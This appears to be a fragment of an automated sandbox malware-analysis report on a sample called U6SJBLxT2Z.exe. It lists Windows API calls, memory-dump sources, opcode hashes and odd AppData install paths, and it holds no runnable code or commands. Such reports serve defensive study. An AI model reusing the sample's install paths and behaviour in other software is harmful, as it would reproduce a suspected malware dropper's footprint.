                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                  • Opcode ID: fbbbde644f61c3462d5bb3700e0e8ce045e8f17eb48d4ba0443cbb1ee7196395
                                                                                                                                                                                                  • Instruction ID: 48b894a6b6243f55f811ea40c192212472d129cd546c7318a3a4cbaf3ee199e0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbbbde644f61c3462d5bb3700e0e8ce045e8f17eb48d4ba0443cbb1ee7196395
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFD05E73A201009BC700DFB8BE8545E73B8EA903293304837D442E20D1E6B898418628
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,6F77123B,?,6F7712DF,00000019,6F7711BE,-000000A0), ref: 6F771225
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11940201311.000000006F771000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F770000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940166905.000000006F770000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940233617.000000006F774000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940257605.000000006F776000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6f770000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocGlobal
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3761449716-0
                                                                                                                                                                                                  • Opcode ID: 04a6d9504f8a35c72d97e42f295fec620d547b87fbb1b6d1d8527367f5c5cf6f
                                                                                                                                                                                                  • Instruction ID: e4cfd9dd78833a92edbc99ac7e5223dba8b46582884b3364a9517c277164c4cd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04a6d9504f8a35c72d97e42f295fec620d547b87fbb1b6d1d8527367f5c5cf6f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18B01270B10410DFEE008F78CC06F3432D4F781315F044061F600C0180C2206820C534
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 004048A7
                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004048D1
                                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404982
                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040498D
                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 004049BF
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 004049CB
                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049DD
                                                                                                                                                                                                    • Part of subcall function 00405A5B: GetDlgItemTextW.USER32(?,?,00000400,00404A14), ref: 00405A6E
                                                                                                                                                                                                    • Part of subcall function 004066C0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75D43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,?,00000009,?), ref: 00406723
                                                                                                                                                                                                    • Part of subcall function 004066C0: CharNextW.USER32(?,?,?,00000000,?,?,00000009,?), ref: 00406732
                                                                                                                                                                                                    • Part of subcall function 004066C0: CharNextW.USER32(?,00000000,75D43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,?,00000009,?), ref: 00406737
                                                                                                                                                                                                    • Part of subcall function 004066C0: CharPrevW.USER32(?,?,75D43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,?,00000009,?), ref: 0040674A
                                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404AA0
                                                                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404ABB
                                                                                                                                                                                                    • Part of subcall function 00404C14: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,?,00000000,00000400,?), ref: 00404CB5
                                                                                                                                                                                                    • Part of subcall function 00404C14: wsprintfW.USER32 ref: 00404CBE
                                                                                                                                                                                                    • Part of subcall function 00404C14: SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                  • String ID: A$C:\Users\user\AppData\Local\subrigidness\testimonialist$Call
                                                                                                                                                                                                  • API String ID: 2624150263-1806205841
                                                                                                                                                                                                  • Opcode ID: 853e4702587f22a3b0095dfd1c3f762452952fa67d6f0456fc7ffaafa7f78d96
                                                                                                                                                                                                  • Instruction ID: 0d1333b798dde08b2b35772059431d035751c92a28532a026af6b574b599a32b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 853e4702587f22a3b0095dfd1c3f762452952fa67d6f0456fc7ffaafa7f78d96
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56A15EF1A00209ABDB11AFA5CD45AAFB7B8EF84314F10843BF601B62D1D77C99418B6D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,?,000000F0), ref: 00402221
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Users\user\AppData\Local\subrigidness\testimonialist\Phonolog\Individualansvarets\Komplementarerne, xrefs: 00402261
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\subrigidness\testimonialist\Phonolog\Individualansvarets\Komplementarerne
                                                                                                                                                                                                  • API String ID: 542301482-1974295416
                                                                                                                                                                                                  • Opcode ID: 232fa026ef0979d97a93aa6195f8e5819eb62f66f95c93cff0119e6fdfb840f1
                                                                                                                                                                                                  • Instruction ID: 552a380bc1a798379165a166047c46cc7e7689cdd056a509842d4882e8d45c12
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 232fa026ef0979d97a93aa6195f8e5819eb62f66f95c93cff0119e6fdfb840f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33410875A00208AFCF00DFE4C989A9E7BB6FF48314B20457AF515EB2D1DB799981CB54
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                                                                                  • Opcode ID: a43a76d6a45d636c0c17ea19c64dbf011eef105185a2cd1b2cb75d3a5dd43b32
                                                                                                                                                                                                  • Instruction ID: 56039e75b3af19f60320d449630e93dfdbb15a7187211f692f50db0849c99601
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a43a76d6a45d636c0c17ea19c64dbf011eef105185a2cd1b2cb75d3a5dd43b32
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8F08C71A04114AEC700DFA4DD499AEB378EF10328F70457BE511F31E0D7B89E119B29
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                                                                                                  • Instruction ID: 1f017aaef81dd0f0ed7cb9892c5a428a4034ef251f890bfd5ca3fce11066bb94
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE1AA71A04709DFDB24CF58C880BAEB7F5EB45305F15842EE896AB2D1D738AA91CF44
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                                                                                  • Instruction ID: 4c948e8094d30857df7bb037d19ad889c7f26ef399dade94ff28b4422ea0219f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4C15931E042199BCF14CF68D8905EEBBB2BF88354F25866AD85677380D738B942CF95
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404DEB
                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404DF8
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E44
                                                                                                                                                                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E5B
                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,004053ED), ref: 00404E75
                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E89
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E9D
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404EB2
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EBE
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404ED0
                                                                                                                                                                                                  • DeleteObject.GDI32(00000110), ref: 00404ED5
                                                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F00
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404F0C
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FA7
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,?,00000110), ref: 00404FD7
                                                                                                                                                                                                    • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FEB
                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00405019
                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405027
                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00405037
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405138
                                                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0040519A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004051AF
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051D3
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051F6
                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 0040520B
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 0040521B
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405294
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040533D
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040534C
                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405376
                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004053C4
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 004053CF
                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004053D6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                  • String ID: $M$N
                                                                                                                                                                                                  • API String ID: 2564846305-813528018
                                                                                                                                                                                                  • Opcode ID: 5598e06cb67788476fc8c7d334527adddce2bdc5635884aaeb3921699d952b74
                                                                                                                                                                                                  • Instruction ID: d580a4fcaa5169941c29ca465f5867fc490570c71858173d192e260bc12e7e27
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5598e06cb67788476fc8c7d334527adddce2bdc5635884aaeb3921699d952b74
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C127A70D00609EFDB20DFA5CD45AAEBBB5FB84314F10817AEA10BA2E1C7798941DF58
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045C4
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004045D8
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045F5
                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 00404606
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404614
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404622
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00404627
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404634
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404649
                                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004046A2
                                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 004046A9
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404717
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404725
                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00404728
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404741
                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00404744
                                                                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404773
                                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404785
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                  • String ID: Call$N
                                                                                                                                                                                                  • API String ID: 3103080414-3438112850
                                                                                                                                                                                                  • Opcode ID: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                                                                                                                                                  • Instruction ID: bc177dfd6b6b6103f733ab6784bbaef7ca361af311f51bfa08924dfc74b84e38
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79618EB1A00209FFDB109F60DD85AAA7B69FB85314F00843AFA15B72D1D778AD51CF98
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
